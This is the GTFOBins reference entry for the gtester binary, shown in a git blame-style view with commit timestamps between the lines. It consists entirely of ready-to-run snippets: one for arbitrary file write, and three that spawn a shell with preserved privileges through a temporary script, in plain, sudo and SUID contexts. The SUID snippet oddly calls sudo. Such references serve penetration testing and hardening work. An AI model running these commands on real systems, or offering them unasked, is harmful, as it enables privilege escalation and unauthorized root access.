GTFOBins.github.io/_gtfobins/gtester.md

30 lines
717 B
Markdown
Raw Permalink Normal View History

2020-03-17 20:32:25 +01:00
---
functions:
file-write:
2021-06-26 11:34:55 +02:00
- description: Data to be written appears in an XML attribute in the output file (`<testbinary path="DATA">`).
code: |
LFILE=file_to_write
gtester "DATA" -o $LFILE
shell:
2020-03-17 20:32:25 +01:00
- code: |
TF=$(mktemp)
echo '#!/bin/sh' > $TF
echo 'exec /bin/sh -p 0<&1' >> $TF
2020-03-17 20:32:25 +01:00
chmod +x $TF
gtester -q $TF
sudo:
- code: |
TF=$(mktemp)
echo '#!/bin/sh' > $TF
echo 'exec /bin/sh 0<&1' >> $TF
chmod +x $TF
sudo gtester -q $TF
suid:
- code: |
TF=$(mktemp)
echo '#!/bin/sh -p' > $TF
echo 'exec /bin/sh -p 0<&1' >> $TF
2020-03-17 20:32:25 +01:00
chmod +x $TF
sudo gtester -q $TF
---